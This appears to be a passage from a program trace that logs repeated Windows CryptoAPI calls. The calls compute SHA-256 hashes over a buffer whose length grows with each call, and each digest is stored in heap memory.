	[0199.508] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.508] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.509] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.509] CryptHashData (hHash=0x22b68c0, pbData=0x2756bf0, dwDataLen=0x140, dwFlags=0x0) returned 1
	[0199.509] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.509] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2690808
	[0199.509] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2690808, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2690808, pdwDataLen=0x1283b0) returned 1
	[0199.509] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0199.509] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.509] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.509] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.509] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x160, dwFlags=0x0) returned 1
	[0199.510] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.510] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26907b8
	[0199.510] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x26907b8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x26907b8, pdwDataLen=0x1283b0) returned 1
	[0199.510] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0199.510] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.510] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.510] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.510] CryptHashData (hHash=0x22b68c0, pbData=0x2756bf0, dwDataLen=0x180, dwFlags=0x0) returned 1
	[0199.510] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.510] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26907e0
	[0199.510] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x26907e0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x26907e0, pdwDataLen=0x1283b0) returned 1
	[0199.510] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0199.510] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.510] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.511] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.511] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x1a0, dwFlags=0x0) returned 1
	[0199.511] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.511] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2690880
	[0199.511] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2690880, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2690880, pdwDataLen=0x1283b0) returned 1
	[0199.511] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0199.511] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.511] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.512] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.512] CryptHashData (hHash=0x22b68c0, pbData=0x2756bf0, dwDataLen=0x1c0, dwFlags=0x0) returned 1
	[0199.512] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.512] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26908a8
	[0199.512] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x26908a8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x26908a8, pdwDataLen=0x1283b0) returned 1
	[0199.512] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0199.512] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.512] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.512] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.513] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x1e0, dwFlags=0x0) returned 1
	[0199.513] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.513] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26908d0
	[0199.513] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x26908d0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x26908d0, pdwDataLen=0x1283b0) returned 1
	[0199.513] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0199.513] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.513] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.513] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.513] CryptHashData (hHash=0x22b68c0, pbData=0x2756bf0, dwDataLen=0x200, dwFlags=0x0) returned 1
	[0199.513] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.513] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26908f8
	[0199.513] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x26908f8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x26908f8, pdwDataLen=0x1283b0) returned 1
	[0199.513] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0199.513] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.514] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.514] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.514] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x220, dwFlags=0x0) returned 1
	[0199.514] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.514] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2690920
	[0199.514] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2690920, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2690920, pdwDataLen=0x1283b0) returned 1
	[0199.514] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0199.514] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.514] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.514] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.514] CryptHashData (hHash=0x22b68c0, pbData=0x2756bf0, dwDataLen=0x240, dwFlags=0x0) returned 1
	[0199.514] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.514] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2690948
	[0199.514] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2690948, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2690948, pdwDataLen=0x1283b0) returned 1
	[0199.514] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0199.515] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.515] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.515] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.515] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x260, dwFlags=0x0) returned 1
	[0199.515] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.515] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2690970
	[0199.515] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2690970, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2690970, pdwDataLen=0x1283b0) returned 1
	[0199.515] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0199.515] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.515] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.515] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.515] CryptHashData (hHash=0x22b68c0, pbData=0x2756bf0, dwDataLen=0x280, dwFlags=0x0) returned 1
	[0199.515] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.515] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2690998
	[0199.515] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2690998, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2690998, pdwDataLen=0x1283b0) returned 1
	[0199.516] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0199.516] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.516] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.516] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.516] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x2a0, dwFlags=0x0) returned 1
	[0199.516] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.516] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26909c0
	[0199.516] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x26909c0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x26909c0, pdwDataLen=0x1283b0) returned 1
	[0199.516] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0199.516] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.516] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.516] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.516] CryptHashData (hHash=0x22b68c0, pbData=0x2756bf0, dwDataLen=0x2c0, dwFlags=0x0) returned 1
	[0199.516] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.517] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26909e8
	[0199.517] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x26909e8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x26909e8, pdwDataLen=0x1283b0) returned 1
	[0199.517] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0199.517] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.517] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.517] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.517] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x2e0, dwFlags=0x0) returned 1
	[0199.517] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.517] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2690a10
	[0199.517] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2690a10, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2690a10, pdwDataLen=0x1283b0) returned 1
	[0199.517] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0199.517] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.517] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.517] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.517] CryptHashData (hHash=0x22b68c0, pbData=0x2756bf0, dwDataLen=0x300, dwFlags=0x0) returned 1
	[0199.518] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.518] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2690a38
	[0199.518] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2690a38, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2690a38, pdwDataLen=0x1283b0) returned 1
	[0199.518] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0199.518] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.518] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.518] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.518] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x320, dwFlags=0x0) returned 1
	[0199.518] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.518] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2690a60
	[0199.518] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2690a60, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2690a60, pdwDataLen=0x1283b0) returned 1
	[0199.518] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0199.518] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.518] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.518] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.518] CryptHashData (hHash=0x22b68c0, pbData=0x2756bf0, dwDataLen=0x340, dwFlags=0x0) returned 1
	[0199.519] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.519] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2690a88
	[0199.519] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2690a88, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2690a88, pdwDataLen=0x1283b0) returned 1
	[0199.519] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0199.519] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.519] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.519] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.519] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x360, dwFlags=0x0) returned 1
	[0199.519] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.519] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2690ab0
	[0199.519] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2690ab0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2690ab0, pdwDataLen=0x1283b0) returned 1
	[0199.519] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0199.519] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.519] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.519] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.519] CryptHashData (hHash=0x22b68c0, pbData=0x2756bf0, dwDataLen=0x380, dwFlags=0x0) returned 1
	[0199.519] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.520] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2690ad8
	[0199.520] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2690ad8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2690ad8, pdwDataLen=0x1283b0) returned 1
	[0199.520] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0199.520] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.520] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.520] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.520] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x3a0, dwFlags=0x0) returned 1
	[0199.520] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.520] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2690b00
	[0199.520] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2690b00, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2690b00, pdwDataLen=0x1283b0) returned 1
	[0199.520] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0199.520] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.520] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.520] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.520] CryptHashData (hHash=0x22b68c0, pbData=0x2756bf0, dwDataLen=0x3c0, dwFlags=0x0) returned 1
	[0199.520] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.521] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2690b28
	[0199.521] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2690b28, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2690b28, pdwDataLen=0x1283b0) returned 1
	[0199.521] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0199.521] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.521] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.521] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.521] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x3e0, dwFlags=0x0) returned 1
	[0199.521] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.521] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2690b50
	[0199.521] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2690b50, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2690b50, pdwDataLen=0x1283b0) returned 1
	[0199.521] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0199.521] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.521] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.521] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.521] CryptHashData (hHash=0x22b68c0, pbData=0x2756bf0, dwDataLen=0x400, dwFlags=0x0) returned 1
	[0199.521] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.521] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2690b78
	[0199.522] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2690b78, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2690b78, pdwDataLen=0x1283b0) returned 1
	[0199.522] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0199.522] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.522] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.522] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.522] CryptHashData (hHash=0x22b6600, pbData=0x2756bf0, dwDataLen=0x420, dwFlags=0x0) returned 1
	[0199.522] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.522] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2690ba0
	[0199.522] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2690ba0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2690ba0, pdwDataLen=0x1283b0) returned 1
	[0199.522] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0199.522] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
	[0199.522] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225390) returned 1
	[0199.522] CryptCreateHash (in: hProv=0x225390, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0199.522] CryptHashData (hHash=0x22b68c0, pbData=0x2756bf0, dwDataLen=0x440, dwFlags=0x0) returned 1
	[0199.522] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0199.522] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2690bc8
	[0199.523] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x2690bc8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2690bc8, pdwDataLen=0x1283b0) returned 1
	[0199.523] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0199.523] CryptReleaseContext (hProv=0x225390, dwFlags=0x0) returned 1
